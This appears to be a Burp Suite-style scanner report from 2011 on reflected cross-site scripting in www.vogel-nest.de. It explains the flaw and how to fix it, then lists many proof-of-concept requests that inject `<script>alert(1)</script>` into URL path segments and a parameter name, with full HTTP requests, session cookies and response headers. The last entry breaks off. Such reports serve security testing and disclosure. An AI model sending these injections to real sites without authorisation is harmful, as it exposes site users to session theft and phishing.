Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a00b2"><script>alert(1)</script>62e569e965 was submitted in the REST URL parameter 1. This input was echoed as a00b2\"><script>alert(1)</script>62e569e965 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icoa00b2"><script>alert(1)</script>62e569e965 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723; __qca=P0-548444246-1297257725663
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:21:55 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:21:56 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18834
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b4a"><script>alert(1)</script>d4f14d53e5d was submitted in the REST URL parameter 1. This input was echoed as 88b4a\"><script>alert(1)</script>d4f14d53e5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wiki88b4a"><script>alert(1)</script>d4f14d53e5d/Main/ImageSnap HTTP/1.1 Host: www.vogel-nest.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:20:32 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; path=/ Last-Modified: Wed, 09 Feb 2011 13:20:32 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a8b5"><script>alert(1)</script>3b93154f082 was submitted in the REST URL parameter 2. This input was echoed as 9a8b5\"><script>alert(1)</script>3b93154f082 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wiki/Main9a8b5"><script>alert(1)</script>3b93154f082/ImageSnap HTTP/1.1 Host: www.vogel-nest.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:20:37 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=fkt9esn83g20ckg3gi95v7r847; path=/ Last-Modified: Wed, 09 Feb 2011 13:20:38 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b413f"><script>alert(1)</script>50a84a19efc was submitted in the REST URL parameter 3. This input was echoed as b413f\"><script>alert(1)</script>50a84a19efc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wiki/Main/ImageSnapb413f"><script>alert(1)</script>50a84a19efc HTTP/1.1 Host: www.vogel-nest.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:20:42 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=uj3o08644lkc908n7eh0ujruf6; path=/ Last-Modified: Wed, 09 Feb 2011 13:20:42 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.5. http://www.vogel-nest.de/wiki/Main/ImageSnap [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vogel-nest.de
Path:
/wiki/Main/ImageSnap
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52b92"><script>alert(1)</script>06c9c7e8396 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52b92\"><script>alert(1)</script>06c9c7e8396 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wiki/Main/ImageSnap?52b92"><script>alert(1)</script>06c9c7e8396=1 HTTP/1.1 Host: www.vogel-nest.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 09 Feb 2011 13:20:30 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Link: <http://wp.me/POZcu-3Y>; rel=shortlink Set-Cookie: PHPSESSID=fp1995v2av1pjresu3qvfusdj3; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49480
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a11b2"><script>alert(1)</script>a4da6ef085e was submitted in the REST URL parameter 1. This input was echoed as a11b2\"><script>alert(1)</script>a4da6ef085e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contenta11b2"><script>alert(1)</script>a4da6ef085e/plugins/lightbox-2/lightbox.js?ver=1.8 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:21:57 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:21:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e86f2"><script>alert(1)</script>efdc24cbe40 was submitted in the REST URL parameter 2. This input was echoed as e86f2\"><script>alert(1)</script>efdc24cbe40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginse86f2"><script>alert(1)</script>efdc24cbe40/lightbox-2/lightbox.js?ver=1.8 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:19 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:21 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89fef"><script>alert(1)</script>cc1782469a3 was submitted in the REST URL parameter 3. This input was echoed as 89fef\"><script>alert(1)</script>cc1782469a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/lightbox-289fef"><script>alert(1)</script>cc1782469a3/lightbox.js?ver=1.8 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:42 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548b9"><script>alert(1)</script>694d0ecadc9 was submitted in the REST URL parameter 4. This input was echoed as 548b9\"><script>alert(1)</script>694d0ecadc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/lightbox-2/lightbox.js548b9"><script>alert(1)</script>694d0ecadc9?ver=1.8 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:57 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:57 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6614"><script>alert(1)</script>8f70211c573 was submitted in the REST URL parameter 1. This input was echoed as d6614\"><script>alert(1)</script>8f70211c573 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentd6614"><script>alert(1)</script>8f70211c573/plugins/shashin/display/highslide.css?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:11 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ff07"><script>alert(1)</script>fb5fd440a02 was submitted in the REST URL parameter 2. This input was echoed as 3ff07\"><script>alert(1)</script>fb5fd440a02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins3ff07"><script>alert(1)</script>fb5fd440a02/shashin/display/highslide.css?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:43 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:44 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db14"><script>alert(1)</script>4e41ef26866 was submitted in the REST URL parameter 3. This input was echoed as 9db14\"><script>alert(1)</script>4e41ef26866 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin9db14"><script>alert(1)</script>4e41ef26866/display/highslide.css?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:05 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83186"><script>alert(1)</script>ca03a214a5a was submitted in the REST URL parameter 4. This input was echoed as 83186\"><script>alert(1)</script>ca03a214a5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display83186"><script>alert(1)</script>ca03a214a5a/highslide.css?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:28 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:28 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b78c"><script>alert(1)</script>20302a1ec26 was submitted in the REST URL parameter 5. This input was echoed as 5b78c\"><script>alert(1)</script>20302a1ec26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin/display/highslide.css5b78c"><script>alert(1)</script>20302a1ec26?ver=4.1.4 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:37 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:38 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c9e4"><script>alert(1)</script>4a272e5d035 was submitted in the REST URL parameter 1. This input was echoed as 8c9e4\"><script>alert(1)</script>4a272e5d035 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content8c9e4"><script>alert(1)</script>4a272e5d035/plugins/shashin/display/highslide/graphics/zoomout.cur HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723; __qca=P0-548444246-1297257725663
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:31 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4def"><script>alert(1)</script>5481a628ff9 was submitted in the REST URL parameter 2. This input was echoed as d4def\"><script>alert(1)</script>5481a628ff9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsd4def"><script>alert(1)</script>5481a628ff9/shashin/display/highslide/graphics/zoomout.cur HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723; __qca=P0-548444246-1297257725663
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:03 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:04 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8250b"><script>alert(1)</script>b8de5556943 was submitted in the REST URL parameter 3. This input was echoed as 8250b\"><script>alert(1)</script>b8de5556943 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/shashin8250b"><script>alert(1)</script>b8de5556943/display/highslide/graphics/zoomout.cur HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723; __qca=P0-548444246-1297257725663
Response
